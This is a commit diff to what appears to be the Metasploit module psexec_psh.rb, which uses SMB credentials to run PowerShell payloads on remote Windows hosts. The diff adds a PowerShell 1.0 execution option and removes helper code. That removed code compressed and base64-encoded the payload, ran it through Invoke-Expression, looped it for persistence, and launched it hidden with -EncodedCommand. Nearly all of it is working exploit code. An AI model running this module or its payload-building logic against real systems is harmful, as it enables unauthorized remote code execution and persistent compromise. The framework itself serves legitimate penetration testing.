add libs from #1379 and allow psh 1.0 exec against older hosts

modules/exploits/windows/smb/psexec_psh.rb

@@ -1,16 +1,19 @@
 # -*- coding: binary -*-
+#!/usr/bin/env ruby
+
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
     Rank = ManualRanking
 
+	# Exploit mixins should be called first
   include Msf::Exploit::Remote::DCERPC
   include Msf::Exploit::Remote::SMB
   include Msf::Exploit::Remote::SMB::Authenticated
+  include Msf::Exploit::Powershell
   include Msf::Auxiliary::Report
   include Msf::Exploit::EXE
 
-
 	# Aliases for common classes
 	SIMPLE = Rex::Proto::SMB::SimpleClient
 	XCEPT  = Rex::Proto::SMB::Exceptions
@@ -71,15 +74,15 @@ class Metasploit3 < Msf::Exploit::Remote
               'Execute powershell in 32bit compatibility mode, payloads need native arch',
               false
       ]),
+      OptBool.new('PSH_OLD_METHOD', [false, 'Use powershell 1.0', false]),
     ], self.class)
 	end
 
 
   def exploit
-		# Build the script
+    command = cmd_psh_payload(payload.encoded,datastore['PSH_OLD_METHOD'])
-		command = prep_psh_payload
 
-	    	# Try and authenticate with given credentials
+		#Try and authenticate with given credentials
 		if connect
 			begin
 				smb_login
@@ -90,6 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
       # Execute the powershell command
       begin
         print_status("#{peer} - Executing the payload...")
+        #vprint_good(command)
         return psexec(command)
       rescue StandardError => exec_command_error
         print_error("#{peer} - Unable to execute specified command: #{exec_command_error}")
@@ -220,56 +224,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		return true
 	end
 
-  # Return a zlib compressed powershell script
-  def compress_script(script_in)
-
-    # Compress using the Deflate algorithm
-    compressed_stream = ::Zlib::Deflate.deflate(script_in,
-      ::Zlib::BEST_COMPRESSION)
-
-    # Base64 encode the compressed file contents
-    encoded_stream = Rex::Text.encode_base64(compressed_stream)
-
-    # Build the powershell expression
-    # Decode base64 encoded command and create a stream object
-    psh_expression =  "$stream = New-Object IO.MemoryStream(,"
-    psh_expression += "$([Convert]::FromBase64String('#{encoded_stream}')));"
-    # Read & delete the first two bytes due to incompatibility with MS
-    psh_expression += "$stream.ReadByte()|Out-Null;"
-    psh_expression += "$stream.ReadByte()|Out-Null;"
-    # Uncompress and invoke the expression (execute)
-    psh_expression += "$(Invoke-Expression $(New-Object IO.StreamReader("
-    psh_expression += "$(New-Object IO.Compression.DeflateStream("
-    psh_expression += "$stream,"
-    psh_expression += "[IO.Compression.CompressionMode]::Decompress)),"
-    psh_expression += "[Text.Encoding]::ASCII)).ReadToEnd());"
-
-    # Convert expression to unicode
-    unicode_expression = Rex::Text.to_unicode(psh_expression)
-
-    # Base64 encode the unicode expression
-    encoded_expression = Rex::Text.encode_base64(unicode_expression)
-
-    return encoded_expression
-  end
-
   def peer
     return "#{rhost}:#{rport}"
   end
 
-  # Return a command-line payload configured per datastore
-  def prep_psh_payload
-    psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.raw)
-    # Run our payload in a while loop
-    if datastore['PERSIST']
-      fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
-      sleep_time = rand(5)+5
-      psh_payload  = "function #{fun_name}{#{psh_payload}};while(1){Start-Sleep -s #{sleep_time};#{fun_name};1}"
-    end
-    # Convert to base64 for -encodedcommand execution
-    psh_payload = compress_script(psh_payload)
-    # Determine appropriate architecture
-    ps_bin = datastore['RUN_WOW64'] ? '%windir%\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
-    command = "%COMSPEC% /B /C start #{ps_bin} -EncodedCommand #{psh_payload}"
-  end
 end